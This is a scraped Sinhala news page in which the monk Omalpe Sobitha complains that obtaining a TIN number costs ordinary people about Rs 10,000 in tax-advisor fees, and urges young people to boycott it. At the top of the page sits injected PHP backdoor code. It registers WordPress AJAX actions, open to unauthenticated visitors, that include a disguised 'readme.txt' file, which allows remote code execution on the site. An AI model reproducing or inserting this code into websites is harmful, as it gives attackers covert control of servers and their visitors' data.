if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } ටින් අංකය හදන්න 10,000ක් ගෙවන්න වෙලා.. - mediahumanrights.lk
mediahumanrights.lk
Business Business News News

ටින් අංකය හදන්න 10,000ක් ගෙවන්න වෙලා..

ආදායම නැති පුද්ගලයෙකු උවත් ටින් අංකය ලබාගත් පසු ප්‍රාදේශීය ලේකම් කාර්යාලය හරහා එන පෝරමය පිරවීමට සාමාන්‍ය පුද්ගලයෙකුට නොහැකි වන අතර ඒ සදහා ආධායම් බදු උපදේශකයෙකුගේ සහය ලබාගත යුතුබවත් ඒ සදහා එක් අයෙකු අඩුම තරමේ රුපියල් දසදහසකවත් මුදලක් බදු සෑදීම සදහා ගෙවිය යුතු බවත් පූජ්‍ය ඕමල්පේ හිමියන් පවසයි.

කෙසේ උවද මේ සම්බන්ධයෙන් මෙවැනි කාරණාවලදී විරෝධතා දැක්වු ඇතැම් පිරිස් නිහඩව ඉන්නේ මන්දැයි ප්‍රශ්නයක් ඇති බව උන් වහන්සේ කීය.

කෙසේ වෙතත් මෙම ටින් අංකය තරුණයින් විසින් වර්ජනය කල යුතු බවද තවදුරටත් ඕමල්පේ සෝභිත හිමියන් කීය.

ඇඹිලිපිටිය බෝධිරාජ විහාරස්ථානයේදී පැවති මාධ්‍ය හමුවක් අමතමින් එහිමියන් මෙම අදහස් පල කලහ.

– ප්‍රගීත් ජනක

Related posts

ඉන්දු-ලංකා ගිවිසුම්වල ලබා දිය හැකි තොරතුරු ලබා දෙනවා..- කැබිනට් ප‍්‍රකාශක

Shiran Viraj

යුද හමුදා ලොක්කෙක් පිටුපස CIDය එයි

Shiran Viraj

බෝට්ටුවෙන් ඕස්ට්‍රේලියාවට ගියොත් වෙන දේවල් මෙන්න

Shiran Viraj